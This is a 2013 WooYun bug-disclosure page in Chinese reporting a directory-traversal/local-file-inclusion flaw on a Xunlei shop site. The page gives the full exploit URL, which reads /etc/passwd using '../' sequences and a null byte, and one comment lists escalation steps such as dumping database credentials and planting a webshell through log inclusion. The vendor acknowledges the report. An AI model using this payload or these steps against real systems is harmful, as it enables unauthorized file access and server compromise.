当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018261

漏洞标题:迅雷某网站可以从上面下载任意系统文件

相关厂商:迅雷

漏洞作者: 梦琳

提交时间:2013-02-02 12:47

修复时间:2013-03-19 12:48

公开时间:2013-03-19 12:48

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-02-02: 细节已通知厂商并且等待厂商处理中
2013-02-02: 厂商已经确认,细节仅向厂商公开
2013-02-12: 细节向核心白帽子及相关领域专家公开
2013-02-22: 细节向普通白帽子公开
2013-03-04: 细节向实习白帽子公开
2013-03-19: 细节向公众公开

简要描述:

迅雷某网站可以从上面下载系统文件

详细说明:

http://shop.xunlei.com/?controller=act&action=index&name=/../../../../../../../../../../../etc/passwd%00.html

漏洞证明:

12.PNG

修复方案:

你懂的!呵呵!

版权声明:转载请注明来源 梦琳@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-02-02 14:33

厂商回复:

感谢反馈,我们马上做相应处理!

最新状态:

暂无

漏洞评价:

评论

  1. 2013-02-02 23:11 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    系统文件- -||

  2. 2013-03-04 18:29 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    本地包含啊。。。

  3. 2013-03-04 19:07 | TituX ( 路人 | Rank:19 漏洞数:3 | <script></script>)

    新手求讲解,这个漏洞是啥意思....那一堆的/../../..放到搜索引擎也搜不出来。。

  4. 2013-03-04 19:35 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @TituX 本地包含漏洞。

  5. 2013-03-06 01:48 | 大肠精 ( 路人 | Rank:0 漏洞数:2 | 业余兴趣而已)

    @TituX ../在WINDOWS中就是上级目录的意思,搜索引擎你用%2e%2e%2f就有一大堆关于这种漏洞的了

  6. 2013-03-06 13:51 | 卖咸鱼 ( 路人 | Rank:8 漏洞数:2 | 专业卖咸鱼)

    本地包含,爆数据库连接,看执行过的shell命令,包含日志写马。搞起

  7. 2013-03-06 19:21 | TituX ( 路人 | Rank:19 漏洞数:3 | <script></script>)

    @大肠精 那怎么知道应该打几个这个东西呢?

  8. 2014-09-26 23:11 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    MAKE